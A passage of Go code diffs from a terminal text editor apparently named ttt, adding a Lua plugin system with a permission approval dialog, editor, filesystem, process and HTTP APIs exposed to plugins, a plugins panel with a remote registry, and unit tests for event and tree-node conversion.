+	}()
+}
+
+func (a *App) handleRemoteRegistryResult(result *RemoteRegistryResult) {
+	if a.PluginsPanel != nil {
+		a.PluginsPanel.SetAvailable(result.Entries)
+	}
 }
 
 func (a *App) showNextPluginApproval() {

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -88,6 +88,13 @@ func (a *App) ShowPluginApprovalDialog(p *plugin.Plugin) {
 				p.RequestRedraw = func() {
 					a.Screen.PostEvent(tcell.NewEventInterrupt(nil))
 				}
+				p.PostAsync = func(result *plugin.PluginAsyncResult) {
+					a.Screen.PostEvent(tcell.NewEventInterrupt(result))
+				}
+				p.Editor = NewPluginEditorAPI(a)
+				p.Filesystem = NewPluginFilesystemAPI()
+				p.System = NewPluginSystemAPI()
+				p.Network = NewPluginNetworkAPI()
 			}
 			a.showNextPluginApproval()
 		}},

--- a/internal/app/commands_plugin.go
+++ b/internal/app/commands_plugin.go
@@ -1,0 +1,107 @@
+package app
+
+import (
+	"github.com/eugenioenko/ttt/internal/command"
+	"github.com/eugenioenko/ttt/internal/plugin"
+	"github.com/eugenioenko/ttt/internal/ui"
+	"github.com/eugenioenko/ttt/internal/widgets"
+)
+
+func registerPluginCommands(app *App) {
+	reg := app.Reg
+
+	reg.Register(command.Command{
+		ID:       "plugin.list",
+		Title:    "Plugins: List Installed",
+		Keywords: []string{"plugin", "extension"},
+		Handler:  func() { app.showPluginList() },
+	})
+}
+
+func (a *App) showPluginList() {
+	plugins := a.PluginManager.Plugins()
+	if len(plugins) == 0 {
+		a.ShowConfirmDialogEx("Plugins", "No plugins installed.", []string{"Close"}, []func(){
+			func() { a.DismissDialog() },
+		})
+		return
+	}
+
+	var entries []widgets.KeyValueEntry
+	for _, p := range plugins {
+		status := "disabled"
+		if p.Enabled {
+			status = "enabled"
+		}
+		if p.LastError != nil {
+			status = "error"
+		}
+		entries = append(entries, widgets.KeyValueEntry{
+			Key:   p.Name,
+			Value: status + " v" + p.Manifest.Version,
+		})
+	}
+
+	a.ShowInfoDialog("Installed Plugins", entries)
+}
+
+func (a *App) ShowPluginApprovalDialog(p *plugin.Plugin) {
+	permEntries := p.Manifest.Permissions.DisplayEntries()
+
+	var kvEntries []widgets.KeyValueEntry
+	for _, e := range permEntries {
+		kvEntries = append(kvEntries, widgets.KeyValueEntry{
+			Key:   e.Name,
+			Value: e.Value,
+		})
+	}
+
+	content := widgets.NewKeyValueListWidget(kvEntries)
+	content.InvertStyles = true
+
+	dialog := widgets.NewDialogWidget(50)
+	dialog.Title = p.Manifest.Name + " requests"
+	dialog.Borders = *a.Borders
+	dialog.SetContent(content)
+	dialog.Buttons = []widgets.DialogButton{
+		{Label: "&Cancel", Handler: func() {
+			a.DismissDialog()
+			a.showNextPluginApproval()
+		}},
+		{Label: "&Allow", Handler: func() {
+			a.DismissDialog()
+			if err := a.PluginManager.ApproveAndLoad(p); err == nil {
+				for _, reg := range a.PluginManager.SidebarPanels {
+					if reg.ID == "plugin."+p.Name {
+						a.Sidebar.AddPanel(reg.ID, reg.Title, ui.NewWidgetAdapter(reg.Widget))
+						break
+					}
+				}
+			}
+			a.showNextPluginApproval()
+		}},
+	}
+	dialog.OnDismiss = func() {
+		a.DismissDialog()
+		a.showNextPluginApproval()
+	}
+	dialog.Build()
+
+	adapter := ui.NewWidgetAdapter(dialog)
+	a.ShowDialog(adapter)
+}
+
+func (a *App) showNextPluginApproval() {
+	if len(a.PendingPluginApprovals) > 0 {
+		a.PendingPluginApprovals = a.PendingPluginApprovals[1:]
+	}
+	if len(a.PendingPluginApprovals) > 0 {
+		a.ShowPluginApprovalDialog(a.PendingPluginApprovals[0])
+	}
+}
+
+func (a *App) ShowPendingPluginApprovals() {
+	if len(a.PendingPluginApprovals) > 0 {
+		a.ShowPluginApprovalDialog(a.PendingPluginApprovals[0])
+	}
+}

--- a/internal/app/eventloop.go
+++ b/internal/app/eventloop.go
@@ -6,6 +6,7 @@ import (
 	"os/exec"
 
 	"github.com/eugenioenko/ttt/internal/git"
+	"github.com/eugenioenko/ttt/internal/plugin"
 	"github.com/eugenioenko/ttt/internal/render"
 	"github.com/eugenioenko/ttt/internal/term"
 	"github.com/eugenioenko/ttt/internal/ui"
@@ -300,6 +301,10 @@ func RunEventLoop(
 						dv.SetNewLines(v.NewLines)
 						dv.FinishLoading()
 					}
+				}
+			case *plugin.PluginAsyncResult:
+				if v.Callback != nil {
+					v.Callback()
 				}
 			case *PrFetchResult:
 				if v.Err != nil {

--- a/internal/app/eventloop.go
+++ b/internal/app/eventloop.go
@@ -306,6 +306,12 @@ func RunEventLoop(
 				if v.Callback != nil {
 					v.Callback()
 				}
+			case *pluginInstallResult:
+				app.handlePluginInstallResult(v)
+			case *pluginUpdateResult:
+				app.handlePluginUpdateResult(v)
+			case *RemoteRegistryResult:
+				app.handleRemoteRegistryResult(v)
 			case *PrFetchResult:
 				if v.Err != nil {
 					app.StatusError("PR fetch failed: " + v.Err.Error())

--- a/internal/app/eventloop.go
+++ b/internal/app/eventloop.go
@@ -136,6 +136,8 @@ func RunEventLoop(
 	syncStatus()
 	redraw()
 
+	app.ShowPendingPluginApprovals()
+
 	for *running {
 		ev := screen.PollEvent()
 		switch tev := ev.(type) {

--- a/internal/app/plugin_api.go
+++ b/internal/app/plugin_api.go
@@ -1,0 +1,310 @@
+package app
+
+import (
+	"bytes"
+	"io"
+	"net/http"
+	"os"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/eugenioenko/ttt/internal/core/undo"
+	"github.com/eugenioenko/ttt/internal/plugin"
+	"github.com/eugenioenko/ttt/internal/ui"
+)
+
+// PluginEditorAPI implements plugin.EditorAPI using the App's editor state.
+type PluginEditorAPI struct {
+	eg *ui.EditorGroupWidget
+}
+
+func NewPluginEditorAPI(app *App) *PluginEditorAPI {
+	return &PluginEditorAPI{eg: app.EditorGroup}
+}
+
+func (e *PluginEditorAPI) BufferText() string {
+	buf := e.eg.ActiveBuffer()
+	if buf == nil {
+		return ""
+	}
+	return strings.Join(buf.Lines, "\n")
+}
+
+func (e *PluginEditorAPI) BufferLines() []string {
+	buf := e.eg.ActiveBuffer()
+	if buf == nil {
+		return nil
+	}
+	result := make([]string, len(buf.Lines))
+	copy(result, buf.Lines)
+	return result
+}
+
+func (e *PluginEditorAPI) CurrentLine() string {
+	buf := e.eg.ActiveBuffer()
+	if buf == nil {
+		return ""
+	}
+	line, _ := e.eg.ActiveCursor()
+	if line >= 0 && line < len(buf.Lines) {
+		return buf.Lines[line]
+	}
+	return ""
+}
+
+func (e *PluginEditorAPI) CursorPos() (int, int) {
+	return e.eg.ActiveCursor()
+}
+
+func (e *PluginEditorAPI) Selection() (bool, int, int, int, int) {
+	ed := e.eg.Editor
+	if ed == nil || ed.Selection == nil || !ed.Selection.Active {
+		return false, 0, 0, 0, 0
+	}
+	line, col := e.eg.ActiveCursor()
+	start, end := ed.Selection.Range(line, col)
+	return true, start.Line, start.Col, end.Line, end.Col
+}
+
+func (e *PluginEditorAPI) SelectionText() string {
+	ed := e.eg.Editor
+	if ed == nil || ed.Selection == nil || !ed.Selection.Active || ed.Buf == nil {
+		return ""
+	}
+	line, col := e.eg.ActiveCursor()
+	return ed.Selection.Text(ed.Buf.Lines, line, col)
+}
+
+func (e *PluginEditorAPI) FilePath() string {
+	return e.eg.ActiveFilePath()
+}
+
+func (e *PluginEditorAPI) FileName() string {
+	return e.eg.ActiveFileName()
+}
+
+func (e *PluginEditorAPI) Language() string {
+	ed := e.eg.Editor
+	if ed == nil || ed.Highlighter == nil {
+		return ""
+	}
+	return ed.Highlighter.Language()
+}
+
+func (e *PluginEditorAPI) Insert(line, col int, text string) {
+	ed := e.eg.Editor
+	if ed == nil || ed.Buf == nil || ed.Undo == nil {
+		return
+	}
+	if line < 0 || line >= len(ed.Buf.Lines) {
+		return
+	}
+
+	if !strings.Contains(text, "\n") {
+		cmd := &undo.InsertStringCommand{Line: line, Col: col, Text: text}
+		cmd.Apply(ed.Buf)
+		ed.Undo.Push(cmd)
+	} else {
+		runes := []rune(ed.Buf.Lines[line])
+		colClamped := col
+		if colClamped > len(runes) {
+			colClamped = len(runes)
+		}
+		suffix := string(runes[colClamped:])
+		cmd := &undo.PasteCommand{Line: line, Col: colClamped, Text: text, Suffix: suffix}
+		cmd.Apply(ed.Buf)
+		ed.Undo.Push(cmd)
+	}
+	ed.FlushOnChange()
+}
+
+func (e *PluginEditorAPI) Replace(startLine, startCol, endLine, endCol int, text string) {
+	ed := e.eg.Editor
+	if ed == nil || ed.Buf == nil || ed.Undo == nil {
+		return
+	}
+	if startLine < 0 || startLine >= len(ed.Buf.Lines) {
+		return
+	}
+
+	delCmd := &undo.DeleteSelectionCommand{
+		StartLine: startLine, StartCol: startCol,
+		EndLine: endLine, EndCol: endCol,
+	}
+	delCmd.Apply(ed.Buf)
+
+	if text == "" {
+		ed.Undo.Push(delCmd)
+		ed.FlushOnChange()
+		return
+	}
+
+	var insertCmd undo.EditCommand
+	if !strings.Contains(text, "\n") {
+		insertCmd = &undo.InsertStringCommand{Line: startLine, Col: startCol, Text: text}
+	} else {
+		runes := []rune(ed.Buf.Lines[startLine])
+		colClamped := startCol
+		if colClamped > len(runes) {
+			colClamped = len(runes)
+		}
+		suffix := string(runes[colClamped:])
+		insertCmd = &undo.PasteCommand{Line: startLine, Col: colClamped, Text: text, Suffix: suffix}
+	}
+	insertCmd.Apply(ed.Buf)
+
+	batch := &undo.BatchCommand{Commands: []undo.EditCommand{delCmd, insertCmd}}
+	ed.Undo.Push(batch)
+	ed.FlushOnChange()
+}
+
+func (e *PluginEditorAPI) SetCursor(line, col int) {
+	ed := e.eg.Editor
+	if ed == nil || ed.Cursor == nil {
+		return
+	}
+	ed.Cursor.Line = line
+	ed.Cursor.Col = col
+	ed.EnsureCursorVisible()
+}
+
+func (e *PluginEditorAPI) SetSelection(startLine, startCol, endLine, endCol int) {
+	ed := e.eg.Editor
+	if ed == nil || ed.Selection == nil || ed.Cursor == nil {
+		return
+	}
+	ed.Selection.Start(startLine, startCol)
+	ed.Cursor.Line = endLine
+	ed.Cursor.Col = endCol
+}
+
+func (e *PluginEditorAPI) ClearSelection() {
+	ed := e.eg.Editor
+	if ed == nil || ed.Selection == nil {
+		return
+	}
+	ed.Selection.Clear()
+}
+
+// PluginFilesystemAPI implements plugin.FilesystemAPI.
+type PluginFilesystemAPI struct{}
+
+func NewPluginFilesystemAPI() *PluginFilesystemAPI {
+	return &PluginFilesystemAPI{}
+}
+
+func (f *PluginFilesystemAPI) ReadFile(path string) (string, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return "", err
+	}
+	return string(data), nil
+}
+
+func (f *PluginFilesystemAPI) WriteFile(path, content string) error {
+	return os.WriteFile(path, []byte(content), 0644)
+}
+
+func (f *PluginFilesystemAPI) FileExists(path string) bool {
+	_, err := os.Stat(path)
+	return err == nil
+}
+
+func (f *PluginFilesystemAPI) ListDir(path string) ([]plugin.FileEntry, error) {
+	entries, err := os.ReadDir(path)
+	if err != nil {
+		return nil, err
+	}
+	result := make([]plugin.FileEntry, len(entries))
+	for i, e := range entries {
+		result[i] = plugin.FileEntry{Name: e.Name(), IsDir: e.IsDir()}
+	}
+	return result, nil
+}
+
+// PluginSystemAPI implements plugin.SystemAPI.
+type PluginSystemAPI struct{}
+
+func NewPluginSystemAPI() *PluginSystemAPI {
+	return &PluginSystemAPI{}
+}
+
+func (s *PluginSystemAPI) Exec(binary string, args []string) (string, string, int, error) {
+	cmd := exec.Command(binary, args...)
+	var stdout, stderr bytes.Buffer
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+	err := cmd.Run()
+	exitCode := 0
+	if err != nil {
+		if exitErr, ok := err.(*exec.ExitError); ok {
+			exitCode = exitErr.ExitCode()
+			err = nil
+		}
+	}
+	return stdout.String(), stderr.String(), exitCode, err
+}
+
+func (s *PluginSystemAPI) Env(name string) string {
+	return os.Getenv(name)
+}
+
+// PluginNetworkAPI implements plugin.NetworkAPI.
+type PluginNetworkAPI struct {
+	client *http.Client
+}
+
+func NewPluginNetworkAPI() *PluginNetworkAPI {
+	return &PluginNetworkAPI{
+		client: &http.Client{Timeout: 30 * time.Second},
+	}
+}
+
+func (n *PluginNetworkAPI) Get(url string, headers map[string]string) (int, string, map[string]string, error) {
+	req, err := http.NewRequest("GET", url, nil)
+	if err != nil {
+		return 0, "", nil, err
+	}
+	for k, v := range headers {
+		req.Header.Set(k, v)
+	}
+	resp, err := n.client.Do(req)
+	if err != nil {
+		return 0, "", nil, err
+	}
+	defer resp.Body.Close()
+	body, err := io.ReadAll(resp.Body)
+	if err != nil {
+		return resp.StatusCode, "", nil, err
+	}
+	respHeaders := make(map[string]string)
+	for k := range resp.Header {
+		respHeaders[k] = resp.Header.Get(k)
+	}
+	return resp.StatusCode, string(body), respHeaders, nil
+}
+
+func (n *PluginNetworkAPI) Post(url string, headers map[string]string, body string) (int, string, map[string]string, error) {
+	req, err := http.NewRequest("POST", url, strings.NewReader(body))
+	if err != nil {
+		return 0, "", nil, err
+	}
+	for k, v := range headers {
+		req.Header.Set(k, v)
+	}
+	resp, err := n.client.Do(req)
+	if err != nil {
+		return 0, "", nil, err
+	}
+	defer resp.Body.Close()
+	respBody, err := io.ReadAll(resp.Body)
+	if err != nil {
+		return resp.StatusCode, "", nil, err
+	}
+	respHeaders := make(map[string]string)
+	for k := range resp.Header {
+		respHeaders[k] = resp.Header.Get(k)
+	}
+	return resp.StatusCode, string(respBody), respHeaders, nil
+}

--- a/internal/app/plugins_panel.go
+++ b/internal/app/plugins_panel.go
@@ -1,0 +1,164 @@
+package app
+
+import (
+	"github.com/eugenioenko/ttt/internal/plugin"
+	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/ui"
+	"github.com/eugenioenko/ttt/internal/widgets"
+)
+
+type PluginsPanel struct {
+	Tree    *widgets.TreeWidget
+	Adapter *ui.WidgetAdapter
+	manager *plugin.Manager
+
+	OnInstall   func(repoURL string)
+	OnUninstall func(name string)
+	OnToggle    func(name string, enabled bool)
+	OnUpdate    func(name string)
+
+	available []plugin.RemoteRegistryEntry
+}
+
+func NewPluginsPanel(mgr *plugin.Manager) *PluginsPanel {
+	pp := &PluginsPanel{
+		manager: mgr,
+	}
+
+	pp.Tree = widgets.NewTreeWidget(widgets.TreeConfig{
+		EmptyText: "No plugins installed",
+		Indent:    1,
+		OnCommand: func(cmd string, node *widgets.TreeNode) {
+			pp.handleCommand(cmd, node)
+		},
+	})
+
+	pp.Adapter = ui.NewWidgetAdapter(pp.Tree)
+	pp.Refresh()
+	return pp
+}
+
+func (pp *PluginsPanel) handleCommand(cmd string, node *widgets.TreeNode) {
+	switch cmd {
+	case "activate":
+		if node.ID != "" && node.Expandable {
+			return
+		}
+		for _, entry := range pp.available {
+			if node.ID == "available."+entry.Name {
+				if pp.OnInstall != nil {
+					pp.OnInstall(entry.Repo)
+				}
+				return
+			}
+		}
+	case "uninstall":
+		if pp.OnUninstall != nil {
+			pp.OnUninstall(node.ID)
+		}
+	case "toggle":
+		reg := pp.manager.Registry()
+		if reg == nil {
+			return
+		}
+		entry := reg.Find(node.ID)
+		if entry == nil {
+			return
+		}
+		if pp.OnToggle != nil {
+			pp.OnToggle(node.ID, !entry.Enabled)
+		}
+	case "update":
+		if pp.OnUpdate != nil {
+			pp.OnUpdate(node.ID)
+		}
+	}
+}
+
+func (pp *PluginsPanel) Refresh() {
+	var items []*widgets.TreeNode
+
+	installedSection := &widgets.TreeNode{
+		ID:         "_installed",
+		Label:      "INSTALLED",
+		Expandable: true,
+		Expanded:   true,
+	}
+
+	reg := pp.manager.Registry()
+	plugins := pp.manager.Plugins()
+	names := pp.manager.InstalledPluginNames()
+
+	for _, name := range names {
+		var badge string
+		var icon string
+		var iconStyle term.Style
+
+		p := pp.manager.FindPlugin(name)
+		if p != nil && p.Enabled {
+			badge = "v" + p.Manifest.Version
+			icon = "●"
+			iconStyle = term.StyleSuccess
+		} else {
+			if reg != nil {
+				if entry := reg.Find(name); entry != nil {
+					badge = "v" + entry.Version
+				}
+			}
+			icon = "○"
+			iconStyle = term.StyleMuted
+		}
+
+		node := &widgets.TreeNode{
+			ID:        name,
+			Label:     name,
+			Badge:     badge,
+			Icon:      icon,
+			IconStyle: iconStyle,
+			Actions: []widgets.Action{
+				{Icon: "↑", Command: "update"},
+				{Icon: "×", Command: "uninstall"},
+			},
+		}
+		installedSection.Children = append(installedSection.Children, node)
+	}
+
+	_ = plugins
+	items = append(items, installedSection)
+
+	if len(pp.available) > 0 {
+		availableSection := &widgets.TreeNode{
+			ID:         "_available",
+			Label:      "AVAILABLE",
+			Expandable: true,
+			Expanded:   true,
+		}
+
+		installed := make(map[string]bool)
+		for _, name := range names {
+			installed[name] = true
+		}
+
+		for _, entry := range pp.available {
+			if installed[entry.Name] {
+				continue
+			}
+			availableSection.Children = append(availableSection.Children, &widgets.TreeNode{
+				ID:    "available." + entry.Name,
+				Label: entry.Name,
+				Badge: entry.Description,
+			})
+		}
+
+		if len(availableSection.Children) > 0 {
+			items = append(items, availableSection)
+		}
+	}
+
+	pp.Tree.SetItems(items)
+}
+
+func (pp *PluginsPanel) SetAvailable(entries []plugin.RemoteRegistryEntry) {
+	pp.available = entries
+	pp.Refresh()
+}

--- a/internal/app/widgets.go
+++ b/internal/app/widgets.go
@@ -125,10 +125,12 @@ func BuildAppFromConfig(cfg *config.AppConfig, borders *term.BorderSet, ws *work
 	terminalPanel.Borders = borders
 	problems := ui.NewProblemsWidget()
 	references := ui.NewReferencesWidget()
+	output := ui.NewOutputWidget()
 	bottomPanel := ui.NewBottomPanelWidget(borders)
 	bottomPanel.AddPanel("terminal", "TERMINAL", terminalPanel)
 	bottomPanel.AddPanel("problems", "PROBLEMS", problems)
 	bottomPanel.AddPanel("references", "REFERENCES", references)
+	bottomPanel.AddPanel("output", "OUTPUT", output)
 
 	contentSplit := ui.NewContentSplitWidget()
 	contentSplit.Top = editorGroup
@@ -197,6 +199,7 @@ func BuildAppFromConfig(cfg *config.AppConfig, borders *term.BorderSet, ws *work
 		TerminalPanel:     terminalPanel,
 		Problems:          problems,
 		References:        references,
+		Output:            output,
 		DocVersions:       make(map[string]int),
 		AllDiagnostics:    make(map[string][]ui.Diagnostic),
 		LspNotified:       make(map[string]bool),

--- a/internal/plugin/api.go
+++ b/internal/plugin/api.go
@@ -1,0 +1,46 @@
+package plugin
+
+type EditorAPI interface {
+	BufferText() string
+	BufferLines() []string
+	CurrentLine() string
+	CursorPos() (line, col int)
+	Selection() (active bool, startLine, startCol, endLine, endCol int)
+	SelectionText() string
+	FilePath() string
+	FileName() string
+	Language() string
+
+	Insert(line, col int, text string)
+	Replace(startLine, startCol, endLine, endCol int, text string)
+	SetCursor(line, col int)
+	SetSelection(startLine, startCol, endLine, endCol int)
+	ClearSelection()
+}
+
+type FileEntry struct {
+	Name  string
+	IsDir bool
+}
+
+type FilesystemAPI interface {
+	ReadFile(path string) (string, error)
+	WriteFile(path, content string) error
+	FileExists(path string) bool
+	ListDir(path string) ([]FileEntry, error)
+}
+
+type SystemAPI interface {
+	Exec(binary string, args []string) (stdout, stderr string, exitCode int, err error)
+	Env(name string) string
+}
+
+type NetworkAPI interface {
+	Get(url string, headers map[string]string) (status int, body string, respHeaders map[string]string, err error)
+	Post(url string, headers map[string]string, body string) (status int, respBody string, respHeaders map[string]string, err error)
+}
+
+type PluginAsyncResult struct {
+	Plugin   *Plugin
+	Callback func()
+}

--- a/internal/plugin/event_convert.go
+++ b/internal/plugin/event_convert.go
@@ -1,0 +1,70 @@
+package plugin
+
+import (
+	"github.com/gdamore/tcell/v2"
+	lua "github.com/yuin/gopher-lua"
+)
+
+func eventToLua(L *lua.LState, ev tcell.Event) *lua.LTable {
+	switch e := ev.(type) {
+	case *tcell.EventKey:
+		return keyEventToLua(L, e)
+	case *tcell.EventMouse:
+		return mouseEventToLua(L, e)
+	}
+	return nil
+}
+
+func keyEventToLua(L *lua.LState, e *tcell.EventKey) *lua.LTable {
+	tbl := L.NewTable()
+	L.SetField(tbl, "type", lua.LString("key"))
+
+	if e.Key() == tcell.KeyRune {
+		L.SetField(tbl, "key", lua.LString(string(e.Rune())))
+		L.SetField(tbl, "rune", lua.LString(string(e.Rune())))
+	} else {
+		name := tcell.KeyNames[e.Key()]
+		if name == "" {
+			name = "unknown"
+		}
+		L.SetField(tbl, "key", lua.LString(name))
+	}
+
+	mod := ""
+	if e.Modifiers()&tcell.ModCtrl != 0 {
+		mod = "ctrl"
+	} else if e.Modifiers()&tcell.ModAlt != 0 {
+		mod = "alt"
+	} else if e.Modifiers()&tcell.ModShift != 0 {
+		mod = "shift"
+	}
+	L.SetField(tbl, "mod", lua.LString(mod))
+
+	return tbl
+}
+
+func mouseEventToLua(L *lua.LState, e *tcell.EventMouse) *lua.LTable {
+	tbl := L.NewTable()
+	L.SetField(tbl, "type", lua.LString("mouse"))
+
+	x, y := e.Position()
+	L.SetField(tbl, "x", lua.LNumber(x))
+	L.SetField(tbl, "y", lua.LNumber(y))
+
+	button := "none"
+	switch {
+	case e.Buttons()&tcell.Button1 != 0:
+		button = "left"
+	case e.Buttons()&tcell.Button2 != 0:
+		button = "right"
+	case e.Buttons()&tcell.Button3 != 0:
+		button = "middle"
+	case e.Buttons()&tcell.WheelUp != 0:
+		button = "wheel_up"
+	case e.Buttons()&tcell.WheelDown != 0:
+		button = "wheel_down"
+	}
+	L.SetField(tbl, "button", lua.LString(button))
+
+	return tbl
+}

--- a/internal/plugin/event_convert_test.go
+++ b/internal/plugin/event_convert_test.go
@@ -1,0 +1,79 @@
+package plugin
+
+import (
+	"testing"
+
+	"github.com/gdamore/tcell/v2"
+	lua "github.com/yuin/gopher-lua"
+)
+
+func TestEventToLuaKeyEvent(t *testing.T) {
+	L := lua.NewState()
+	defer L.Close()
+
+	ev := tcell.NewEventKey(tcell.KeyRune, 'a', tcell.ModNone)
+	tbl := eventToLua(L, ev)
+	if tbl == nil {
+		t.Fatal("expected non-nil table")
+	}
+
+	if tbl.RawGetString("type").String() != "key" {
+		t.Error("expected type=key")
+	}
+	if tbl.RawGetString("key").String() != "a" {
+		t.Errorf("expected key=a, got %s", tbl.RawGetString("key").String())
+	}
+}
+
+func TestEventToLuaKeyEventSpecial(t *testing.T) {
+	L := lua.NewState()
+	defer L.Close()
+
+	ev := tcell.NewEventKey(tcell.KeyEnter, 0, tcell.ModNone)
+	tbl := eventToLua(L, ev)
+	if tbl == nil {
+		t.Fatal("expected non-nil table")
+	}
+
+	key := tbl.RawGetString("key").String()
+	if key != "Enter" {
+		t.Errorf("expected key=Enter, got %s", key)
+	}
+}
+
+func TestEventToLuaKeyEventCtrl(t *testing.T) {
+	L := lua.NewState()
+	defer L.Close()
+
+	ev := tcell.NewEventKey(tcell.KeyRune, 'a', tcell.ModCtrl)
+	tbl := eventToLua(L, ev)
+
+	mod := tbl.RawGetString("mod").String()
+	if mod != "ctrl" {
+		t.Errorf("expected mod=ctrl, got %s", mod)
+	}
+}
+
+func TestEventToLuaMouseEvent(t *testing.T) {
+	L := lua.NewState()
+	defer L.Close()
+
+	ev := tcell.NewEventMouse(5, 10, tcell.Button1, tcell.ModNone)
+	tbl := eventToLua(L, ev)
+	if tbl == nil {
+		t.Fatal("expected non-nil table")
+	}
+
+	if tbl.RawGetString("type").String() != "mouse" {
+		t.Error("expected type=mouse")
+	}
+	if int(tbl.RawGetString("x").(lua.LNumber)) != 5 {
+		t.Error("expected x=5")
+	}
+	if int(tbl.RawGetString("y").(lua.LNumber)) != 10 {
+		t.Error("expected y=10")
+	}
+	if tbl.RawGetString("button").String() != "left" {
+		t.Error("expected button=left")
+	}
+}

--- a/internal/plugin/lua_callbacks.go
+++ b/internal/plugin/lua_callbacks.go
@@ -1,0 +1,92 @@
+package plugin
+
+import (
+	"log/slog"
+
+	"github.com/eugenioenko/ttt/internal/widgets"
+	lua "github.com/yuin/gopher-lua"
+)
+
+func (p *Plugin) CallLuaFunc(fn *lua.LFunction, args ...lua.LValue) error {
+	if p.State == nil || fn == nil {
+		return nil
+	}
+	err := p.State.CallByParam(lua.P{
+		Fn:      fn,
+		NRet:    0,
+		Protect: true,
+	}, args...)
+	if err != nil {
+		p.LastError = err
+		slog.Error("plugin callback error", "plugin", p.Name, "error", err)
+	}
+	return err
+}
+
+func TreeNodeToLua(L *lua.LState, node *widgets.TreeNode) *lua.LTable {
+	tbl := L.NewTable()
+	L.SetField(tbl, "id", lua.LString(node.ID))
+	L.SetField(tbl, "label", lua.LString(node.Label))
+	if node.Icon != "" {
+		L.SetField(tbl, "icon", lua.LString(node.Icon))
+	}
+	if node.Badge != "" {
+		L.SetField(tbl, "badge", lua.LString(node.Badge))
+	}
+	L.SetField(tbl, "expanded", lua.LBool(node.Expanded))
+	L.SetField(tbl, "muted", lua.LBool(node.Muted))
+
+	if len(node.Children) > 0 {
+		children := L.NewTable()
+		for _, child := range node.Children {
+			children.Append(TreeNodeToLua(L, child))
+		}
+		L.SetField(tbl, "children", children)
+	}
+	return tbl
+}
+
+func LuaTableToTreeNodes(L *lua.LState, tbl *lua.LTable) []*widgets.TreeNode {
+	var nodes []*widgets.TreeNode
+	tbl.ForEach(func(_, v lua.LValue) {
+		if item, ok := v.(*lua.LTable); ok {
+			nodes = append(nodes, luaTableToTreeNode(L, item))
+		}
+	})
+	return nodes
+}
+
+func luaTableToTreeNode(L *lua.LState, tbl *lua.LTable) *widgets.TreeNode {
+	node := &widgets.TreeNode{}
+
+	if v := L.GetField(tbl, "id"); v != lua.LNil {
+		node.ID = v.String()
+	}
+	if v := L.GetField(tbl, "label"); v != lua.LNil {
+		node.Label = v.String()
+	}
+	if v := L.GetField(tbl, "icon"); v != lua.LNil {
+		node.Icon = v.String()
+	}
+	if v := L.GetField(tbl, "badge"); v != lua.LNil {
+		node.Badge = v.String()
+	}
+	if v := L.GetField(tbl, "muted"); v != lua.LNil {
+		node.Muted = lua.LVAsBool(v)
+	}
+	if v := L.GetField(tbl, "expanded"); v != lua.LNil {
+		node.Expanded = lua.LVAsBool(v)
+	}
+	if v := L.GetField(tbl, "expandable"); v != lua.LNil {
+		node.Expandable = lua.LVAsBool(v)
+	}
+
+	if children, ok := L.GetField(tbl, "children").(*lua.LTable); ok {
+		node.Children = LuaTableToTreeNodes(L, children)
+		if len(node.Children) > 0 {
+			node.Expandable = true
+		}
+	}
+
+	return node
+}

--- a/internal/plugin/lua_callbacks.go
+++ b/internal/plugin/lua_callbacks.go
@@ -1,8 +1,6 @@
 package plugin
 
 import (
-	"log/slog"
-
 	"github.com/eugenioenko/ttt/internal/widgets"
 	lua "github.com/yuin/gopher-lua"
 )
@@ -18,7 +16,7 @@ func (p *Plugin) CallLuaFunc(fn *lua.LFunction, args ...lua.LValue) error {
 	}, args...)
 	if err != nil {
 		p.LastError = err
-		slog.Error("plugin callback error", "plugin", p.Name, "error", err)
+		p.logError("callback", err)
 	}
 	return err
 }

--- a/internal/plugin/lua_callbacks_test.go
+++ b/internal/plugin/lua_callbacks_test.go
@@ -1,0 +1,105 @@
+package plugin
+
+import (
+	"testing"
+
+	"github.com/eugenioenko/ttt/internal/widgets"
+	lua "github.com/yuin/gopher-lua"
+)
+
+func TestCallLuaFuncProtected(t *testing.T) {
+	p := &Plugin{Name: "test"}
+	p.State = lua.NewState()
+	defer p.State.Close()
+
+	fn := p.State.NewFunction(func(L *lua.LState) int {
+		L.RaiseError("intentional")
+		return 0
+	})
+
+	err := p.CallLuaFunc(fn)
+	if err == nil {
+		t.Fatal("expected error from crashing function")
+	}
+	if p.LastError == nil {
+		t.Error("expected LastError to be set")
+	}
+}
+
+func TestCallLuaFuncNil(t *testing.T) {
+	p := &Plugin{Name: "test"}
+	err := p.CallLuaFunc(nil)
+	if err != nil {
+		t.Errorf("expected no error for nil func, got %v", err)
+	}
+}
+
+func TestTreeNodeToLuaRoundtrip(t *testing.T) {
+	L := lua.NewState()
+	defer L.Close()
+
+	node := &widgets.TreeNode{
+		ID:       "root",
+		Label:    "Root Node",
+		Icon:     "📁",
+		Badge:    "3",
+		Expanded: true,
+		Children: []*widgets.TreeNode{
+			{ID: "child1", Label: "Child 1"},
+			{ID: "child2", Label: "Child 2", Muted: true},
+		},
+	}
+
+	tbl := TreeNodeToLua(L, node)
+
+	if tbl.RawGetString("id").String() != "root" {
+		t.Error("expected id=root")
+	}
+	if tbl.RawGetString("label").String() != "Root Node" {
+		t.Error("expected label=Root Node")
+	}
+	if tbl.RawGetString("icon").String() != "📁" {
+		t.Error("expected icon")
+	}
+
+	children := tbl.RawGetString("children").(*lua.LTable)
+	if children.Len() != 2 {
+		t.Fatalf("expected 2 children, got %d", children.Len())
+	}
+}
+
+func TestLuaTableToTreeNodes(t *testing.T) {
+	L := lua.NewState()
+	defer L.Close()
+
+	err := L.DoString(`
+		items = {
+			{ id = "a", label = "Alpha", icon = "📁", children = {
+				{ id = "a1", label = "Alpha-1" },
+			}},
+			{ id = "b", label = "Beta", muted = true },
+		}
+	`)
+	if err != nil {
+		t.Fatalf("lua error: %v", err)
+	}
+
+	tbl := L.GetGlobal("items").(*lua.LTable)
+	nodes := LuaTableToTreeNodes(L, tbl)
+
+	if len(nodes) != 2 {
+		t.Fatalf("expected 2 nodes, got %d", len(nodes))
+	}
+	if nodes[0].ID != "a" || nodes[0].Label != "Alpha" {
+		t.Errorf("node 0: got id=%s label=%s", nodes[0].ID, nodes[0].Label)
+	}
+	if len(nodes[0].Children) != 1 {
+		t.Fatalf("expected 1 child, got %d", len(nodes[0].Children))
+	}
+	if nodes[0].Children[0].ID != "a1" {
